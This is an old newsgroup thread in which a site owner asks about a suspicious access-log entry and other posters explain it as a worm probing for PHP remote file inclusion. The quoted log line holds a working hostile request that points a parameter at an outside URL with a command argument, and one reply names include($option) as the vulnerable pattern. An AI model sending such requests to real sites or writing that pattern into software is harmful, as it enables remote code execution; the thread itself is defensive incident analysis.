how access log tell intrusions?

Hello,

How can I tell if my site has been hacked from looking the access_log or
other log files? I found the following log entry suspicious because of
its 'option' part but cannot tell more than that, like what it really
did to my site, etc.

access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET
/rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id
HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

I bet there must be a lot information or tools that can help detect
intrusion by parsing access logs. I just don't know where to start. So
I would appreciate any guidance or pointers.

Bing

bingster <bdu@iastate.edu> said:
>How can I tell if my site has been hacked from looking the access_log or
>other log files? I found the following log entry suspicious because of
> its 'option' part but cannot tell more than that, like what it really
>did to my site, etc.
>
>access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET
>/rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id
>HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

This looks like a variant of proxying - so, could it be that your
server can be "fooled" to access and proxy arbitary 3rd-party web
resources by accessing through /rhel/index.php as shown above?

So, most possibly the above is done to circumvent local access
restrictions at 65.8.116.62, and the harm done to you is loss of
bandwidth and appearance of your IP address at www.setanet.com.br
access logs (which might be a problem if the access to the 3rd-party
site was malicious).

As this is your own site, go and read the /rhel/index.php script to
see what it does when given the option query parameter. Also, think
whether you need to expose the /rhel/ resource tree to the Internet.
--
Wolf a.k.a. Juha Laiho Espoo, Finland
(GC 3.0) GIT d- s+: a C++ ULSH++++$ P++@ L+++ E- W+$@ N++ !K w !O !M V
PS(+) PE Y+ PGP(+) t- 5 !X R !tv b+ !DI D G e+ h---- r+++ y++++
"...cancel my subscription to the resurrection!" (Jim Morrison)

Thanks very much for the heads-up. I did not quite get what you said.
Is there any tutorial like information on what the effect is of
embedding URL within other URL?

Bing

Juha Laiho wrote:

> bingster <bdu@iastate.edu> said:
>
>>How can I tell if my site has been hacked from looking the access_log or
>>other log files? I found the following log entry suspicious because of
>> its 'option' part but cannot tell more than that, like what it really
>>did to my site, etc.
>>
>>access_log.2:65.8.116.62 - - [18/Dec/2004:17:56:51 -0600] "GET
>>/rhel/index.php?option=http://www.setanet.com.br/cse.gif?&cmd=id
>>HTTP/1.0" 200 7611 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
>
> This looks like a variant of proxying - so, could it be that your
> server can be "fooled" to access and proxy arbitary 3rd-party web
> resources by accessing through /rhel/index.php as shown above?
>
> So, most possibly the above is done to circumvent local access
> restrictions at 65.8.116.62, and the harm done to you is loss of
> bandwidth and appearance of your IP address at www.setanet.com.br
> access logs (which might be a problem if the access to the 3rd-party
> site was malicious).
>
> As this is your own site, go and read the /rhel/index.php script to
> see what it does when given the option query parameter. Also, think
> whether you need to expose the /rhel/ resource tree to the Internet.

bingster <bdu@iastate.edu> writes:
> Thanks very much for the heads-up. I did not quite get what you
> said. Is there any tutorial like information on what the effect is of
> embedding URL within other URL?

This depends entirely on the script. By default, absolutely no effect
*but* some scripts may be set up to do one or more of:
a) Download the URL
b) Display a link to the URL
c) Send a HTTP redirect to the URL
d) Run arbitrary commands, as directed by the content of the URL
e) Format your hard disk
f) Play the 1812 overture from the server's internal speaker
g) Something else entirely

This particular thing looks a bit like a worm that's been going around
that replaces random parameters in URLs with a URL, in the hope that
'd' will occur. With the number of badly written scripts on the web,
it's bound to work eventually.

> Juha Laiho wrote:
> > bingster <bdu@iastate.edu> said:
> >> How can I tell if my site has been hacked from looking the
> >> access_log or other log files? I found the following log entry
> >> suspicious because of its 'option' part but cannot tell more than
> >> that, like what it really did to my site, etc.

It's suspicious but maybe not dangerous.

Look at the PHP script in question. If it does:
include($option); or
require($option); or
something else similar, then you are in trouble.

If you have PHP safe mode turned *on* you may be in much less trouble,
as this blocks most arbitrary command execution.

If the script doesn't have something like that - it just does something like
if ($option == 'one') {
function_one(1,2,3);
} else {
function_two(4,5,6);
}
then it's safe.

If you don't understand PHP, you will need to learn PHP before
determining if the script is safe to put a URL in the 'option'
value. There are several PHP tutorials on the web, some good, some
which will inadvertantly encourage you into writing scripts that do
'd'...

--
Chris

bingster <bdu@iastate.edu> said:
>Thanks very much for the heads-up. I did not quite get what you said.
>Is there any tutorial like information on what the effect is of
>embedding URL within other URL?

Chris already pretty much answered this (so, all depends on how the
program _on_your_machine_ interprets the data), but to emphasize one
part of my previous reply:

>> As this is your own site, go and read the /rhel/index.php script to
>> see what it does when given the option query parameter. Also, think
>> whether you need to expose the /rhel/ resource tree to the Internet.

So, is the /rhel/ tree something you want to provide for anyone and
everyone on the Internet? If not, disable public access to that.
--
Wolf a.k.a. Juha Laiho Espoo, Finland
(GC 3.0) GIT d- s+: a C++ ULSH++++$ P++@ L+++ E- W+$@ N++ !K w !O !M V
PS(+) PE Y+ PGP(+) t- 5 !X R !tv b+ !DI D G e+ h---- r+++ y++++
"...cancel my subscription to the resurrection!" (Jim Morrison)